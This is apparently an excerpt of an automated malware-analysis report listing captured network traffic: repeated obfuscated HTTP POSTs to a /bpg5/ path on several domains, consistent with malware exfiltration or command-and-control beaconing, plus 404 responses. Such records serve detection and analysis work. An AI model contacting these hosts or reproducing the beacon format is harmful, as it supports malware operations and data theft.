          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 70 56 78 34 50 44 34 73 69 52 35 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yDcF=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhpVx4PD4siR5tLOu4pA).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 42 63 6a 34 5a 64 74 46 70 38 57 5a 33 62 72 61 63 72 28 4f 6d 69 47 4a 42 66 70 31 43 6e 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 70 61 71 7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 4b 43 79 43 30 67 61 71 33 31 59 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yDcF=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7KCyC0gaq31YHqliqlw).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.jhg61.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.jhg61.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jhg61.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 6b 4d 7a 56 7a 76 66 53 45 47 53 6f 36 5f 61 65 41 38 63 71 79 48 77 66 63 79 59 4b 6d 33 57 50 43 69 73 6a 51 72 47 64 6c 42 6c 56 64 37 41 75 78 6a 6e 67 54 44 48 4e 36 41 6b 70 75 77 30 56 78 52 7e 6f 70 55 64 49 70 4c 72 4c 59 53 48 47 68 57 41 4c 6d 7a 33 6b 63 49 77 75 53 65 66 63 77 6b 58 5f 6c 69 49 54 79 76 41 2d 73 75 58 61 79 4a 6b 41 34 2d 65 57 4b 4c 58 68 4c 68 48 46 59 47 79 73 52 66 47 63 41 4d 71 58 4d 56 6b 43 67 71 4a 57 42 49 7e 31 4e 71 41 70 51 41 35 42 52 74 46 6b 4d 75 51 61 47 37 59 69 45 54 56 32 6f 4e 54 41 77 5f 70 7a 52 5a 71 52 6d 4e 36 59 5a 33 67 48 74 34 6b 33 4e 57 75 49 50 72 38 77 70 61 70 7a 7a 43 35 36 6b 41 44 6d 46 59 32 53 55 64 78 7a 66 64 4a 34 30 43 64 7a 68 52 38 2d 76 48 59 66 38 59 36 74 78 64 45 33 62 49 42 48 61 69 33 73 62 52 34 6f 33 49 28 52 45 70 6d 66 39 72 69 73 67 49 57 53 39 53 73 59 59 50 4e 37 52 37 55 45 7e 73 56 4e 30 58 50 44 55 38 54 34 31 73 34 34 72 43 37 35 59 4e 71 69 37 68 71 54 67 39 4a 30 6c 56 71 57 50 59 41 76 55 64 4b 48 35 6a 71 39 41 51 32 6b 4d 4d 38 32 4a 6a 58 63 62 78 46 64 74 6b 34 43 6c 4e 37 45 43 46 46 30 31 6b 42 7a 53 67 47 61 59 53 55 6f 4f 36 62 55 47 61 31 77 30 6d 30 57 69 33 62 4c 30 77 68 46 74 68 42 62 36 42 34 33 4e 67 74 37 45 76 70 79 59 66 71 36 28 7a 28 44 6b 71 6d 41 57 38 57 30 50 77 6c 50 57 74 6d 53 35 57 32 52 56 49 7a 30 34 64 6a 67 6a 6d 4f 4b 59 4f 52 69 36 5a 37 42 4a 63 37 30 4b 5a 6e 5f 68 51 62 67 4a 74 61 68 46 2d 5a 6a 28 58 6c 41 6c 42 56 4d 35 63 52 53 6f 52 79 48 73 4c 78 52 36 41 4d 38 54 43 28 52 61 2d 59 62 56 58 36 72 57 45 67 51 74 75 6a 76 64 53 77 35 76 63 4a 6b 48 71 51 46 58 71 76 4f 36 42 54 62 7a 4e 38 49 7a 7a 6a 55 6a 70 6a 6c 38 72 44 48 4e 78 54 76 77 7a 6e 62 33 6f 78 4c 55 6e 45 72 45 67 38 54 43 30 28 30 56 36 6a 49 55 6d 55 58 37 6d 69 33 5a 50 44 73 7e 4d 64 6c 64 72 51 4d 43 35 4e 6b 65 65 6b 34 4f 73 71 6c 48 53 51 2d 37 76 56 6c 30 48 64 61 4b 44 47 65 32 32 55 74 4b 38 72 35 49 69 4d 36 52 6c 39 32 78 4e 76 35 72 68 77 39 4f 37 61 7a 58 55 73 33 37 55 41 5a 74 57 73 43 7a 6e 79 68 48 4b 65 46 4f 78 73 41 7a 31 75 79 53 76 4c 41 61 4e 4e 44 54 62 47 4c 51 38 4c 71 45 7a 6c 34 59 54 79 33 45 61 49 65 51 43 47 59 58 4d 32 77 7e 34 35 67 7e 45 6b 74 51 74 36 31 4d 63 35 4e 52 4e 59 61 30 63 66 62 79 39 79 49 6b 62 38 47 70 5f 61 41 61 67 38 39 57 31 61 33 6e 6c 4c 78 77 6d 43 47 6d 39 54 61 71 52 48 75 51 52 4b 52 38 30 44 2d 32 71 61 58 45 5f 6f 68 77 5f 75 4b 34 75 36 54 66 79 72 75 77 6e 58 4c 71 66 65 42 7e 6c 57 50 46 32 62 37 4d 59 47 45 34 47 63 73 35 56 54 57 32 7a 37 4c 4c 66 43 4f 32 37 73 45 74 65 43 33 3
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 69 30 47 71 55 4e 4a 4f 7e 33 4e 6a 47 62 43 31 51 6b 73 4d 46 37 47 77 76 38 5a 7a 6f 6c 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 33 6f 56 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 28 2d 58 5a 36 48 66 6b 79 54 31 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yDcF=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLD(-XZ6HfkyT1A0lH06Q).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 78 79 53 4e 52 57 41 78 51 4d 64 5a 50 48 28 78 6b 59 4c 6e 76 62 78 79 57 34 44 6d 70 34 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 74 39 58 4
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 74 6f 53 39 6f 68 69 41 53 74 6e 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yDcF=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECtoS9ohiAStnKB1vRKw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 23 May 2023 07:39:05 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:15 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:18 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 May 2023 07:39:20 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
